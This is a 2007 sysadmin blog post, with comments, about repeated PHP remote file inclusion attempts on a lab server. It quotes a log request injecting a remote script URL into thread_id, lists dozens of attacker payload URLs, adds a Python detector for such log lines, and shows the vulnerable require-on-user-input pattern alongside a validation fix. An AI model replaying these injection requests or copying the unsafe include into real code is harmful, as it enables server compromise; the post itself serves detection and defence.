11.16.07
Dumbest Break-in Attempts
At work I run a project management server for our research group (the SAnToS Lab). Over the course of my time managing the machine I have had several break-in attempts (about a bijillion times might be a good guess) and a few successful ones. Lately, I think I have come across some of the dumbest script-kiddies on the planet (I feel safe in saying this since nobody, especially them, reads this blog).
They are trying to take advantage of PHP's ability to include code from arbitrary URLs when the allow_url_fopen setting (and, from PHP 5.2 on, allow_url_include) permits it. This is a very, very, very common hole in web applications, not just this particular server or PHP. The attack is called remote file inclusion, a form of code injection, and is a reasonable way to crack into systems on the internet. I claim that this particular script-kiddie is dumb because they constantly try the same URL with the same injection URL from the same machine. For example, while watching today I saw 14 straight attempts to access the same URL from the same machine in less than 30 seconds. What kind of idiot writes this type of script? Some idiot that doesn't understand programming? On the other hand, I am not a security expert so maybe this is some really savvy way to break into hardened systems (doubtful but possible).
What’s worse is that it is obvious that the same script is being run on many “zombie” machines. They try to access the same URL, repeatedly, from different machines. I guess they figure that if it didn’t work from 1 machine that it might work from 1,000 machines.
Here is an example of what this looks like in the logs:

74.13.92.186 - - [16/Nov/2007:21:05:46 +0000] "GET /forum/forum.php?thread_id=http://amyru.h18.ru/images/cs.txt? HTTP/1.1" 200 7994 "-" "Wget/1.1 (compatible; i486; Linux; RedHat7.3)"

And right after that they did 13 more (formatted to show just the times and IPs):

74.13.92.186 - - [16/Nov/2007:21:05:49 +0000]
74.13.92.186 - - [16/Nov/2007:21:05:49 +0000]
74.13.92.186 - - [16/Nov/2007:21:05:54 +0000]
74.13.92.186 - - [16/Nov/2007:21:05:54 +0000]
74.13.92.186 - - [16/Nov/2007:21:05:56 +0000]
74.13.92.186 - - [16/Nov/2007:21:05:57 +0000]
74.13.92.186 - - [16/Nov/2007:21:06:02 +0000]
74.13.92.186 - - [16/Nov/2007:21:06:02 +0000]
74.13.92.186 - - [16/Nov/2007:21:06:02 +0000]
74.13.92.186 - - [16/Nov/2007:21:06:05 +0000]
74.13.92.186 - - [16/Nov/2007:21:06:05 +0000]
74.13.92.186 - - [16/Nov/2007:21:06:08 +0000]
74.13.92.186 - - [16/Nov/2007:21:06:10 +0000]

Here are some of the URLs that they have tried to inject today:
http://garyz.110mb.com/safeon.txt
http://cherrygirl.h18.ru/images/cs.txt
http://jjisdfiuw834wsdd.chat.ru/js
http://kiopmanminsuion.chat.ru/http
http://musicgirll.chat.ru/wav/mysong
http://rumusic.chat.ru/rumusic.wav
http://amygirl.chat.ru/images/image.txt
http://amyru.h18.ru/images/cs.txt
http://cherrygirl.h18.ru/images/cs.txt
http://himanhimanioum.chat.ru/man
http://jjisdfiuw834wsdd.chat.ru/js
http://kiopmanminsuion.chat.ru/http
http://musicgirll.chat.ru/wav/mysong
http://ninaru.hut2.ru/images/cs.txt
http://rumusic.chat.ru/rumusic.wav
http://users2.TitanicHost.com/ninagirl/pb.txt
http://www.voice.ch/uu
http://201.37.71.117:8090/cmd.txt
http://201.37.71.117:8090/cmdimbox.txt
http://garyz.110mb.com/safeon.txt
http://amygirl.3-hosting.net/cs.txt
http://amyru.h18.ru/images/cs.txt
http://jjisdfiuw834wsdd.chat.ru/js
http://kiopmanminsuion.chat.ru/http
http://musicgirll.chat.ru/wav/mysong
http://ninaru.hut2.ru/images/cs.txt
http://rumusic.chat.ru/rumusic.wav
http://www.voice.ch/uu
http://201.37.71.117:8090/cmd.txt
http://201.37.71.117:8090/cmdimbox.txt
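The pattern described above (one script, one injected URL, many attempts from one or many source addresses) can be pulled out of the access log mechanically instead of by eye. What follows is an added example, not code from the original post or from the SAnToS Lab server: a Python script that parses Apache combined-format log lines like the one quoted above, flags any query parameter whose value is a remote URL, tallies attempts per source IP and per payload, and applies a sliding-window check for the burst behaviour the post describes (14 requests in under 30 seconds). The sample log is constructed for the example: its first line is the request quoted in the post, while the other source addresses, the benign request with thread_id=42 and the malformed line are made up. The scheme list and the 30-second window are assumptions, not settings from the post.

```python
import re
from collections import Counter
from datetime import datetime
from urllib.parse import urlsplit, parse_qsl

# Apache "combined" log format, the layout of the excerpt in the post.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<agent>[^"]*)"$'
)

# Parameter values starting with any of these count as an inclusion payload
# (assumed list; extend it for whatever wrappers your PHP build enables).
REMOTE_SCHEMES = ("http://", "https://", "ftp://", "ftps://", "php://", "data:")

# Constructed sample log. Line 1 is the request quoted in the post; the other
# source addresses, the benign request and the malformed line are made up.
SAMPLE_LOG = """\
74.13.92.186 - - [16/Nov/2007:21:05:46 +0000] "GET /forum/forum.php?thread_id=http://amyru.h18.ru/images/cs.txt? HTTP/1.1" 200 7994 "-" "Wget/1.1 (compatible; i486; Linux; RedHat7.3)"
74.13.92.186 - - [16/Nov/2007:21:05:49 +0000] "GET /forum/forum.php?thread_id=http://amyru.h18.ru/images/cs.txt? HTTP/1.1" 200 7994 "-" "Wget/1.1 (compatible; i486; Linux; RedHat7.3)"
74.13.92.186 - - [16/Nov/2007:21:05:54 +0000] "GET /forum/forum.php?thread_id=http://amyru.h18.ru/images/cs.txt? HTTP/1.1" 200 7994 "-" "Wget/1.1 (compatible; i486; Linux; RedHat7.3)"
198.51.100.23 - - [16/Nov/2007:21:06:02 +0000] "GET /forum/forum.php?thread_id=http://201.37.71.117:8090/cmd.txt? HTTP/1.1" 200 7994 "-" "Wget/1.1 (compatible; i486; Linux; RedHat7.3)"
192.0.2.15 - - [16/Nov/2007:21:07:10 +0000] "GET /forum/forum.php?thread_id=42 HTTP/1.1" 200 8120 "-" "Mozilla/5.0"
this line is not in combined log format
"""


def parse_line(line):
    """Split one combined-format line into fields; None if it does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def injected_urls(target):
    """Return (parameter, value) pairs whose value points at a remote resource."""
    query = urlsplit(target).query
    return [(name, value)
            for name, value in parse_qsl(query, keep_blank_values=True)
            if value.lower().startswith(REMOTE_SCHEMES)]


def summarize(lines):
    """Collect inclusion attempts and tally them by source IP and by payload."""
    attempts, by_ip, by_payload = [], Counter(), Counter()
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue                        # unparseable line: skip, do not guess
        for param, url in injected_urls(rec["target"]):
            payload = url.rstrip("?")       # the trailing '?' is attacker padding
            attempts.append((rec["ip"], rec["time"], param, payload, rec["status"]))
            by_ip[rec["ip"]] += 1
            by_payload[payload] += 1
    return attempts, by_ip, by_payload


def parse_time(stamp):
    """Apache's timestamp, e.g. '16/Nov/2007:21:05:46 +0000'."""
    return datetime.strptime(stamp, "%d/%b/%Y:%H:%M:%S %z")


def burst_sources(attempts, window_seconds=30, threshold=5):
    """Map each IP to its largest attempt count inside any window, if >= threshold."""
    times_by_ip = {}
    for ip, stamp, _param, _payload, _status in attempts:
        times_by_ip.setdefault(ip, []).append(parse_time(stamp))
    noisy = {}
    for ip, times in times_by_ip.items():
        times.sort()
        start, best = 0, 0
        for end, t in enumerate(times):     # classic two-pointer sliding window
            while (t - times[start]).total_seconds() > window_seconds:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            noisy[ip] = best
    return noisy


if __name__ == "__main__":
    found, per_ip, per_payload = summarize(SAMPLE_LOG.splitlines())
    for ip, count in per_ip.most_common():
        print(f"{count:4d} attempts from {ip}")
    for url, count in per_payload.most_common():
        print(f"{count:4d} x {url}")
    print("burst sources:", burst_sources(found, window_seconds=30, threshold=3))
```

The trailing "?" on the injected URL is stripped before counting: attackers append it so that anything the vulnerable script concatenates after the variable (a ".php" suffix, say) becomes a harmless query string on the remote fetch instead of part of the path, which is why the same payload shows up with and without it. The regex is deliberately strict; a line it cannot parse is skipped rather than guessed at, so the malformed sample line contributes nothing. A 200 status on a flagged line does not by itself mean the inclusion succeeded (the forum page may simply have rendered as usual), so treat the tallies as a list of sources to block and of payload hosts to fetch and inspect, not as evidence of compromise.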
Note to script-kiddies: this particular hole was closed 3 years ago when Jesse and I did some routine maintenance. But if you think about it a little and get creative, you might find other holes that we failed to find. So please stop pounding the machine with your requests that fail.
Sorry, these script-kiddies are just stupid and are really annoying me today. Rant over.
Dotan Mazor said,
November 17, 2007 at 11:35 pm
SAnToS,
Who knows? Maybe they tried to "huff and puff until they blow your house in".
It appears that you do have readers. And from Israel, nonetheless.
We have had the same attempts, but not by “dumb” script kiddies. They actually know several access points on our domain, which means that they have managed to squeeze some information out of the server.
Could you post a reference of the hole that you fixed? Knowing our sys admins, it is already fixed, but I wouldn’t want to crash down because of such an assumption.
And thank you for your sarcastic article. As they say: some kiddies never die – they just smell that way…
Dotan
Nothing to see here » PHP include attacks rolling on… said,
November 19, 2007 at 10:20 am
[...] I decide to google one of the URL’s that’s included, and right off the bat, I found this article from a web site that’s seeing the same thing. I believe these attacks are being launched [...]
Todd said,
November 19, 2007 at 11:56 am
Dotan
I don’t have specifics about the holes we patched (it was done a while ago and I didn’t keep notes) but the basic idea was to validate any incoming variables in PHP. Using the example log above, our scripts now check to make sure thread_id is a number. This can be done using the following:
<?php
// Reject anything that is not a number before it reaches the include.
// exit_error() is presumably the forum's own helper that prints the message and stops the script.
if (!is_numeric($thread_id)) {
    exit_error("Invalid thread id", "The thread id you sent was invalid. Please try again with a valid thread id.");
}
Another thing to do would be to make sure you don’t use the PHP inclusion mechanism for any variables taken in from the user. For example, don’t do something like this:
require($thread_id); // user-controlled value passed straight to the include mechanism
Otherwise, good luck. These script-kiddies are really annoying.